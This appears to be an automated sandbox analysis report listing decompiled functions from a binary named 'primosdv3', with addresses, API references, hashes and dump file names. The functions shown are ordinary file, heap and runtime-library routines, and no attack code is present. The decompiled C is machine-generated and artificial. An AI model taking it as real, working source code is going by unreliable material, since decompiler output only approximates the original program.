Opcode Fuzzy Hash: bcdd027bf57826c64065a79b1ecc2ea3305691580979a37c32a734296b099377
Instruction Fuzzy Hash: 8841CE316043418FDB34DF15E5C456AB7EDFFD9720F148A2EE8A183261D770EE458A51

Uniqueness

Uniqueness Score: -1.00%

Function 00C8BA27 Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00C8BA27(signed int __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8) {
				char _v8;
				char _v16;
				void* __ebp;
				char _t31;
				signed int _t36;
				char _t40;
				intOrPtr _t44;
				char _t45;
				signed int _t51;
				void* _t64;
				void* _t70;
				signed int _t75;
				void* _t81;

				_t81 = __eflags;
				_t68 = __edx;
				_v8 = E00C897E5(__ebx, __ecx, __edx);
				E00C8BB4E(__ebx, __ecx, __edx, __edi, __esi, _t81);
				_t31 = E00C8B7BB(_t81, _a4);
				_v16 = _t31;
				_t57 =  *(_v8 + 0x48);
				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t70 = E00C88E06(_t57, 0x220);
				_t51 = __ebx | 0xffffffff;
				__eflags = _t70;
				if(__eflags == 0) {
					L5:
					_t75 = _t51;
					goto L6;
				} else {
					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
					 *_t70 =  *_t70 & 0x00000000; // executed
					_t36 = E00C8BBF0(_t68, _t70, __eflags, _v16, _t70); // executed
					_t75 = _t36;
					__eflags = _t75 - _t51;
					if(_t75 != _t51) {
						__eflags = _a8;
						if(_a8 == 0) {
							E00C88B6F();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t51 == 1;
						if(_t51 == 1) {
							_t45 = _v8;
							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0xc9ec70;
							if( *((intOrPtr*)(_t45 + 0x48)) != 0xc9ec70) {
								E00C88DCC( *((intOrPtr*)(_t45 + 0x48)));
							}
						}
						 *_t70 = 1;
						_t64 = _t70;
						_t70 = 0;
						 *(_v8 + 0x48) = _t64;
						_t40 = _v8;
						__eflags =  *(_t40 + 0x350) & 0x00000002;
						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0xc9eef0 & 0x00000001;
							if(( *0xc9eef0 & 0x00000001) == 0) {
								_v16 =  &_v8;
								E00C8B691(5,  &_v16);
								__eflags = _a8;
								if(_a8 != 0) {
									_t44 =  *0xc9ee90; // 0x36823a0
									 *0xc9e964 = _t44;
								}
							}
						}
						L6:
						E00C88DCC(_t70);
						return _t75;
					} else {
						 *((intOrPtr*)(E00C891A8())) = 0x16;
						goto L5;
					}
				}
			}

0x00c8ba27
0x00c8ba27
0x00c8ba34
0x00c8ba37
0x00c8ba3f
0x00c8ba48
0x00c8ba4b
0x00c8ba51
0x00000000
0x00c8ba53
0x00c8ba57
0x00c8ba58
0x00c8ba59
0x00c8ba64
0x00c8ba66
0x00c8ba6a
0x00c8ba6c
0x00c8ba9c
0x00c8ba9c
0x00000000
0x00c8ba6e
0x00c8ba7b
0x00c8ba81
0x00c8ba84
0x00c8ba89
0x00c8ba8d
0x00c8ba8f
0x00c8baae
0x00c8bab2
0x00c8bab4
0x00c8bab4
0x00c8babf
0x00c8bac3
0x00c8bac4
0x00c8bac6
0x00c8bac9
0x00c8bad0
0x00c8bad5
0x00c8bada
0x00c8bad0
0x00c8badb
0x00c8bae1
0x00c8bae6
0x00c8bae8
0x00c8baeb
0x00c8baee
0x00c8baf5
0x00c8baf7
0x00c8bafe
0x00c8bb03
0x00c8bb0c
0x00c8bb11
0x00c8bb17
0x00c8bb19
0x00c8bb1e
0x00c8bb1e
0x00c8bb17
0x00c8bafe
0x00c8ba9e
0x00c8ba9f
0x00000000
0x00c8ba91
0x00c8ba96
0x00000000
0x00c8ba96
0x00c8ba8f

APIs

Part of subcall function 00C897E5: GetLastError.KERNEL32(?,00CA1098,00C84674,00CA1098,?,?,00C840EF,?,?,00CA1098), ref: 00C897E9
Part of subcall function 00C897E5: _free.LIBCMT ref: 00C8981C
Part of subcall function 00C897E5: SetLastError.KERNEL32(00000000,?,00CA1098), ref: 00C8985D
Part of subcall function 00C897E5: _abort.LIBCMT ref: 00C89863

Part of subcall function 00C8BB4E: _abort.LIBCMT ref: 00C8BB80
Part of subcall function 00C8BB4E: _free.LIBCMT ref: 00C8BBB4

Part of subcall function 00C8B7BB: GetOEMCP.KERNEL32(00000000,?,?,00C8BA44,?), ref: 00C8B7E6

_free.LIBCMT ref: 00C8BA9F
_free.LIBCMT ref: 00C8BAD5

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 22aab47859aa7ed486d2e19124180fb45239b02128a5ecb4f7042115461fb537
Instruction ID: b2bcf197d4394e05e68dd507e38307d86bf622e3e3725640ca7fb1b3f029be87
Opcode Fuzzy Hash: 22aab47859aa7ed486d2e19124180fb45239b02128a5ecb4f7042115461fb537
Instruction Fuzzy Hash: 37310E31904209AFDB14FFA9D445BEDB7F5EF40328F25409AE4245B2A1EB325E44FB58

Uniqueness

Uniqueness Score: -1.00%

Function 00C61E50 Relevance: 3.1, APIs: 2, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00C61E50(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t38;
				intOrPtr _t47;
				void* _t68;
				unsigned int _t70;
				signed int _t72;
				intOrPtr* _t74;
				void* _t76;

				_t68 = __edx;
				E00C7EB78(0xc92673, _t76);
				_t55 = 0;
				 *((intOrPtr*)(_t76 - 0x10)) = __ecx;
				 *((intOrPtr*)(_t76 - 0x24)) = 0;
				 *(_t76 - 0x20) = 0;
				 *((intOrPtr*)(_t76 - 0x1c)) = 0;
				 *((intOrPtr*)(_t76 - 0x18)) = 0;
				 *((char*)(_t76 - 0x14)) = 0;
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t76 - 4)) = 0;
				_push(_t76 - 0x24);
				_t38 = E00C63BBA(__ecx); // executed
				if(_t38 != 0) {
					_t70 =  *(_t76 - 0x20);
					E00C61732(_t76 - 0x24, _t68, 1);
					_t74 =  *((intOrPtr*)(_t76 + 8));
					 *((char*)( *(_t76 - 0x20) +  *((intOrPtr*)(_t76 - 0x24)) - 1)) = 0;
					_t16 = _t70 + 1; // 0x1
					E00C618A9(_t74, _t16);
					_t47 =  *((intOrPtr*)(_t76 - 0x10));
					if( *((intOrPtr*)(_t47 + 0x6cc8)) != 3) {
						if(( *(_t47 + 0x460c) & 0x00000001) == 0) {
							E00C71B84( *((intOrPtr*)(_t76 - 0x24)),  *_t74,  *((intOrPtr*)(_t74 + 4)));
						} else {
							_t72 = _t70 >> 1;
							E00C71BFD( *((intOrPtr*)(_t76 - 0x24)),  *_t74, _t72);
							 *((short*)( *_t74 + _t72 * 2)) = 0;
						}
					} else {
						_push( *((intOrPtr*)(_t74 + 4)));
						_push( *_t74);
						_push( *((intOrPtr*)(_t76 - 0x24)));
						E00C71C3B();
					}
					E00C618A9(_t74, E00C83E13( *_t74));
					_t55 = 1;
				}
				_t39 =  *((intOrPtr*)(_t76 - 0x24));
				 *((intOrPtr*)(_t76 - 4)) = 2;
				if( *((intOrPtr*)(_t76 - 0x24)) != 0) {
					if( *((char*)(_t76 - 0x14)) != 0) {
						E00C6F445(_t39,  *((intOrPtr*)(_t76 - 0x1c)));
						_t39 =  *((intOrPtr*)(_t76 - 0x24));
					}
					L00C83E2E(_t39);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return _t55;
			}

0x00c61e50
0x00c61e55
0x00c61e5e
0x00c61e62
0x00c61e65
0x00c61e68
0x00c61e6b
0x00c61e6e
0x00c61e71
0x00c61e74
0x00c61e75
0x00c61e79
0x00c61e7c
0x00c61e7f
0x00c61e86
0x00c61e8e
0x00c61e96
0x00c61ea1
0x00c61ea4
0x00c61ea8
0x00c61eae
0x00c61eb3
0x00c61ebd
0x00c61ed5
0x00c61ef6
0x00c61ed7
0x00c61ed7
0x00c61edf
0x00c61ee8
0x00c61ee8
0x00c61ebf
0x00c61ebf
0x00c61ec2
0x00c61ec4
0x00c61ec7
0x00c61ec7
0x00c61f06
0x00c61f0c
0x00c61f0e
0x00c61f0f
0x00c61f12
0x00c61f1b
0x00c61f21
0x00c61f27
0x00c61f2c
0x00c61f2c
0x00c61f30
0x00c61f35
0x00c61f3c
0x00c61f44

APIs

__EH_prolog.LIBCMT ref: 00C61E55

Part of subcall function 00C63BBA: __EH_prolog.LIBCMT ref: 00C63BBF

_wcslen.LIBCMT ref: 00C61EFD

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: 177c8146a7c39bfac27537e6f49d7787507fc4718979015768b1334db10e5e2d
Instruction ID: 9e84d095515dcaeeb399543c795c8733845c451871d2a90b3480cdca8b69b4e5
Opcode Fuzzy Hash: 177c8146a7c39bfac27537e6f49d7787507fc4718979015768b1334db10e5e2d
Instruction Fuzzy Hash: 9E314B71904249AFCF21DF99C985AEEBBF5AF48300F184069F845A7251CB329E01DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00C69DA2 Relevance: 3.1, APIs: 2, Instructions: 83
timeCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00C69DA2(void* __ecx, void* __esi, signed int _a4, signed int* _a8, signed int* _a12) {
				void* _v8;
				void* _v16;
				void* _v24;
				signed char _v25;
				signed char _v26;
				int _t35;
				signed char _t50;
				signed int* _t52;
				signed char _t58;
				void* _t59;
				void* _t60;
				signed int* _t61;
				signed int* _t63;

				_t60 = __esi;
				_t59 = __ecx;
				if( *(__ecx + 0x20) != 0x100 && ( *(__ecx + 0x20) & 0x00000002) == 0) {
					FlushFileBuffers( *(__ecx + 8));
				}
				_t52 = _a4;
				_t50 = 1;
				if(_t52 == 0 || ( *_t52 | _t52[1]) == 0) {
					_t58 = 0;
					_v25 = 0;
				} else {
					_t58 = 1;
					_v25 = 1;
				}
				_push(_t60);
				_t61 = _a8;
				if(_t61 == 0) {
					L9:
					_v26 = 0;
				} else {
					_v26 = _t50;
					if(( *_t61 | _t61[1]) == 0) {
						goto L9;
					}
				}
				_t63 = _a12;
				if(_t63 == 0 || ( *_t63 | _a4) == 0) {
					_t50 = 0;
				}
				if(_t58 != 0) {
					E00C7138A(_t52, _t58,  &_v24);
				}
				if(_v26 != 0) {
					E00C7138A(_t61, _t58,  &_v8);
				}
				if(_t50 != 0) {
					E00C7138A(_t63, _t58,  &_v16);
				}
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t35 = SetFileTime( *(_t59 + 8),  ~(_v26 & 0x000000ff) &  &_v8,  ~(_t50 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
				return _t35;
			}

0x00c69da2
0x00c69da8
0x00c69db1
0x00c69dbc
0x00c69dbc
0x00c69dc2
0x00c69dc8
0x00c69dcb
0x00c69ddc
0x00c69dde
0x00c69dd4
0x00c69dd4
0x00c69dd6
0x00c69dd6
0x00c69de2
0x00c69de3
0x00c69de9
0x00c69df6
0x00c69df6
0x00c69deb
0x00c69df0
0x00c69df4
0x00000000
0x00000000
0x00c69df4
0x00c69dfb
0x00c69e01
0x00c69e0b
0x00c69e0b
0x00c69e0f
0x00c69e16
0x00c69e16
0x00c69e20
0x00c69e29
0x00c69e29
0x00c69e31
0x00c69e3a
0x00c69e3a
0x00c69e4a
0x00c69e58
0x00c69e68
0x00c69e70
0x00c69e7c

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00C673BC,?,?,?,00000000), ref: 00C69DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00C69E70

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: e6bf29dd5e906d19041aa1ff43c9ce8738dee4e8fdd1732231e1f0f0176902d9
Instruction ID: c480f7fd1858ef7a9041a9729bc8695fe0b2377c3792290fb22a3b0788cc493e
Opcode Fuzzy Hash: e6bf29dd5e906d19041aa1ff43c9ce8738dee4e8fdd1732231e1f0f0176902d9
Instruction Fuzzy Hash: 1D21F2312482459BC724CF35C4D1AABBBE8EF51704F08481DF4E583151D339DA0D9B61

Uniqueness

Uniqueness Score: -1.00%

Function 00C6966E Relevance: 3.1, APIs: 2, Instructions: 82
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C6966E(void* __ecx, WCHAR* _a4100, signed char _a4104) {
				short _v0;
				signed int _t27;
				void* _t29;
				signed char _t38;
				signed int _t42;
				long _t45;
				void* _t46;
				long _t48;

				E00C7EC50(0x1000);
				_t38 = _a4104;
				_t46 = __ecx;
				_t42 = _t38 >> 1;
				if((_t38 & 0x00000010) != 0) {
					L3:
					_t48 = 1;
					__eflags = 1;
				} else {
					_t52 =  *((char*)(__ecx + 0x30));
					if( *((char*)(__ecx + 0x30)) != 0) {
						goto L3;
					} else {
						_t48 = 0;
					}
				}
				 *(_t46 + 0x20) = _t38;
				_t45 = ((_t42 ^ 0x00000001) << 0x1f) + 0x40000000;
				_t27 =  *(E00C6C27E(_t52, _a4100)) & 0x0000ffff;
				if(_t27 == 0x2e || _t27 == 0x20) {
					if((_t38 & 0x00000020) != 0) {
						goto L8;
					} else {
						_t39 = _a4100;
						_t29 = _t27 | 0xffffffff;
					}
				} else {
					L8:
					_t39 = _a4100;
					__eflags = 0;
					_t29 = CreateFileW(_a4100, _t45, _t48, 0, 2, 0, 0); // executed
				}
				 *(_t46 + 8) = _t29;
				if(_t29 == 0xffffffff && E00C6BB03(_t39,  &_v0, 0x800) != 0) {
					 *(_t46 + 8) = CreateFileW( &_v0, _t45, _t48, 0, 2, 0, 0);
				}
				 *(_t46 + 0x10) =  *(_t46 + 0x10) & 0x00000000;
				 *((char*)(_t46 + 0x1c)) = 1;
				 *((char*)(_t46 + 0x15)) = 0;
				return E00C70602(_t46 + 0x32, _t39, 0x800) & 0xffffff00 |  *(_t46 + 8) != 0xffffffff;
			}

0x00c69673
0x00c69679
0x00c69685
0x00c69687
0x00c6968c
0x00c69698
0x00c6969a
0x00c6969a
0x00c6968e
0x00c6968e
0x00c69692
0x00000000
0x00c69694
0x00c69694
0x00c69694
0x00c69692
0x00c696a9
0x00c696ac
0x00c696b7
0x00c696bd
0x00c696c7
0x00000000
0x00c696c9
0x00c696c9
0x00c696d0
0x00c696d0
0x00c696d5
0x00c696d5
0x00c696d5
0x00c696dc
0x00c696e6
0x00c696e6
0x00c696ec
0x00c696f2
0x00c6971c
0x00c6971c
0x00c6971f
0x00c6972d
0x00c69731
0x00c6974b

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00C69F27,?,?,00C6771A), ref: 00C696E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00C69F27,?,?,00C6771A), ref: 00C69716

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b860cc5ab501d62fb48fa3bdf0ceab17e41ad70271e7ffcec0cc828651cb49fc
Instruction ID: 2670185e2578adc62485d470cd971fc4c4d1e12ae598a48d7e3981a23d96fb0d
Opcode Fuzzy Hash: b860cc5ab501d62fb48fa3bdf0ceab17e41ad70271e7ffcec0cc828651cb49fc
Instruction Fuzzy Hash: D021CCB1104344AFE3708A65CCC9FB7B7DCEB49324F104A19FAE6C21D1C7B8A9849A71

Uniqueness

Uniqueness Score: -1.00%

Function 00C8A3D0 Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C8A3D0(void* __ebx, signed int __ecx, void* __edx) {
				void* __edi;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t14;
				intOrPtr _t18;
				signed int _t21;
				void* _t23;
				signed int _t29;
				intOrPtr _t31;
				intOrPtr _t32;

				_t24 = __ecx;
				_t23 = __ebx;
				_t9 =  *0xcc2274; // 0x200
				_t31 = 3;
				if(_t9 != 0) {
					__eflags = _t9 - _t31;
					if(_t9 < _t31) {
						_t9 = _t31;
						goto L4;
					}
				} else {
					_t9 = 0x200;
					L4:
					 *0xcc2274 = _t9;
				}
				_t10 = E00C8B136(_t24, _t9, 4); // executed
				 *0xcc2278 = _t10;
				E00C88DCC(0);
				if( *0xcc2278 != 0) {
					L8:
					_t29 = 0;
					__eflags = 0;
					_t32 = 0xc9e800;
					do {
						_t1 = _t32 + 0x20; // 0xc9e820
						E00C8AF0A(_t23, _t24, _t29, __eflags, _t1, 0xfa0, 0);
						_t14 =  *0xcc2278; // 0x0
						 *((intOrPtr*)(_t14 + _t29 * 4)) = _t32;
						_t24 = (_t29 & 0x0000003f) * 0x30;
						_t18 =  *((intOrPtr*)( *((intOrPtr*)(0xcc2290 + (_t29 >> 6) * 4)) + 0x18 + (_t29 & 0x0000003f) * 0x30));
						__eflags = _t18 - 0xffffffff;
						if(_t18 == 0xffffffff) {
							L12:
							 *((intOrPtr*)(_t32 + 0x10)) = 0xfffffffe;
						} else {
							__eflags = _t18 - 0xfffffffe;
							if(_t18 == 0xfffffffe) {
								goto L12;
							} else {
								__eflags = _t18;
								if(_t18 == 0) {
									goto L12;
								}
							}
						}
						_t32 = _t32 + 0x38;
						_t29 = _t29 + 1;
						__eflags = _t32 - 0xc9e8a8;
					} while (__eflags != 0);
					__eflags = 0;
					return 0;
				} else {
					 *0xcc2274 = _t31;
					 *0xcc2278 = E00C8B136(_t24, _t31, 4);
					_t21 = E00C88DCC(0);
					if( *0xcc2278 != 0) {
						goto L8;
					} else {
						return _t21 | 0xffffffff;
					}
				}
			}

0x00c8a3d0
0x00c8a3d0
0x00c8a3d0
0x00c8a3d8
0x00c8a3db
0x00c8a3e4
0x00c8a3e6
0x00c8a3e8
0x00000000
0x00c8a3e8
0x00c8a3dd
0x00c8a3dd
0x00c8a3ea
0x00c8a3ea
0x00c8a3ea
0x00c8a3f2
0x00c8a3f9
0x00c8a3fe
0x00c8a40d
0x00c8a43a
0x00c8a43b
0x00c8a43b
0x00c8a43d
0x00c8a442
0x00c8a449
0x00c8a44d
0x00c8a452
0x00c8a45c
0x00c8a464
0x00c8a46e
0x00c8a472
0x00c8a475
0x00c8a480
0x00c8a480
0x00c8a477
0x00c8a477
0x00c8a47a
0x00000000
0x00c8a47c
0x00c8a47c
0x00c8a47e
0x00000000
0x00000000
0x00c8a47e
0x00c8a47a
0x00c8a487
0x00c8a48a
0x00c8a48b
0x00c8a48b
0x00c8a494
0x00c8a497
0x00c8a40f
0x00c8a412
0x00c8a41f
0x00c8a424
0x00c8a433
0x00000000
0x00c8a435
0x00c8a439
0x00c8a439
0x00c8a433

APIs

_free.LIBCMT ref: 00C8A3FE
_free.LIBCMT ref: 00C8A424

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 38662d6379486b63bf30184c0dbe253a164c6fcd9220249011cc1f5fcbbcb81b
Instruction ID: 1f0e4f2225d2ae593d85eb085fab80691a6c8b2c2b81235e18517d35a4ee7fba
Opcode Fuzzy Hash: 38662d6379486b63bf30184c0dbe253a164c6fcd9220249011cc1f5fcbbcb81b
Instruction Fuzzy Hash: 8311B671A142119AFF20BB38EC49F5973A4A750B38F141727F660CB2E0E7B4CD42934A

Uniqueness

Uniqueness Score: -1.00%

Function 00C69E80 Relevance: 3.1, APIs: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00C69E80(void* __ecx) {
				long _v8;
				void* __ebp;
				long _t13;
				long _t15;
				signed int _t17;
				char* _t33;
				void* _t36;
				long _t37;
				void* _t39;

				_push(__ecx);
				_t36 = __ecx;
				_t33 = __ecx + 0x1e;
				if( *((intOrPtr*)(__ecx + 8)) != 0xffffffff) {
					_t21 = __ecx + 0x32;
					goto L4;
				} else {
					if( *_t33 == 0) {
						L12:
						_t17 = _t13 | 0xffffffff;
					} else {
						_t21 = __ecx + 0x32;
						E00C66D5B(0xca1098, _t39, __ecx + 0x32);
						L4:
						if( *((intOrPtr*)(_t36 + 0x10)) != 1) {
							_v8 = _v8 & 0x00000000;
							_t15 = SetFilePointer( *(_t36 + 8), 0,  &_v8, 1); // executed
							_t37 = _t15;
							if(_t37 != 0xffffffff) {
								L10:
								asm("cdq");
								_t17 = 0 + _t37;
								asm("adc edx, 0x0");
							} else {
								_t13 = GetLastError();
								if(_t13 == 0) {
									goto L10;
								} else {
									if( *_t33 == 0) {
										goto L12;
									} else {
										E00C66D5B(0xca1098, _t39, _t21);
										goto L10;
									}
								}
							}
						} else {
							_t17 =  *(_t36 + 0x28);
						}
					}
				}
				return _t17;
			}

0x00c69e83
0x00c69e86
0x00c69e8d
0x00c69e90
0x00c69ea7
0x00000000
0x00c69e92
0x00c69e95
0x00c69f02
0x00c69f02
0x00c69e97
0x00c69e97
0x00c69ea0
0x00c69eaa
0x00c69eae
0x00c69eb8
0x00c69ec7
0x00c69ecd
0x00c69ed2
0x00c69eee
0x00c69ef3
0x00c69ef8
0x00c69efa
0x00c69ed4
0x00c69ed4
0x00c69edc
0x00000000
0x00c69ede
0x00c69ee1
0x00000000
0x00c69ee3
0x00c69ee9
0x00000000
0x00c69ee9
0x00c69ee1
0x00c69edc
0x00c69eb0
0x00c69eb0
0x00c69eb3
0x00c69eae
0x00c69e95
0x00c69f01

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00C69EC7
GetLastError.KERNEL32 ref: 00C69ED4

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: a8b523d530c251b4d944d19118a4ba70be8ba399f8a39f176b4fab319a5f6568
Instruction ID: 1974976da1a5ec7eb1147fe53c563883196818bd3a6c8b60388148c01ac45f5b
Opcode Fuzzy Hash: a8b523d530c251b4d944d19118a4ba70be8ba399f8a39f176b4fab319a5f6568
Instruction Fuzzy Hash: BD11E130600701ABD734C669C8C4BAAB7ECEB45370F604A2AE563D26D0D772EE4AC760

Uniqueness

Uniqueness Score: -1.00%

Function 00C88E54 Relevance: 3.0, APIs: 2, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00C88E54(void* __ecx, void* __edx, void* _a4, long _a8) {
				void* _t4;
				long _t7;
				void* _t9;
				void* _t13;
				void* _t14;
				long _t16;

				_t13 = __edx;
				_t10 = __ecx;
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = _t16 - 0xffffffe0;
						if(_t16 <= 0xffffffe0) {
							while(1) {
								_t4 = HeapReAlloc( *0xcc26e4, 0, _t14, _t16);
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E00C88C34();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E00C87A5E(_t10, _t13, __eflags, _t16);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E00C891A8())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E00C88DCC(_t14);
					goto L6;
				}
				_t9 = E00C88E06(__ecx, _a8); // executed
				return _t9;
			}

0x00c88e54
0x00c88e54
0x00c88e5a
0x00c88e5f
0x00c88e6d
0x00c88e70
0x00c88e72
0x00c88e7d
0x00c88e80
0x00c88ea7
0x00c88eb1
0x00c88eb7
0x00c88eb9
0x00000000
0x00000000
0x00c88e98
0x00c88e9a
0x00000000
0x00000000
0x00c88e9d
0x00c88ea2
0x00c88ea3
0x00c88ea5
0x00000000
0x00000000
0x00c88ea5
0x00c88e8f
0x00000000
0x00c88e8f
0x00c88e82
0x00c88e87
0x00c88e8d
0x00c88e8d
0x00c88e8d
0x00000000
0x00c88e8d
0x00c88e75
0x00000000
0x00c88e7a
0x00c88e64
0x00000000

APIs

_free.LIBCMT ref: 00C88E75

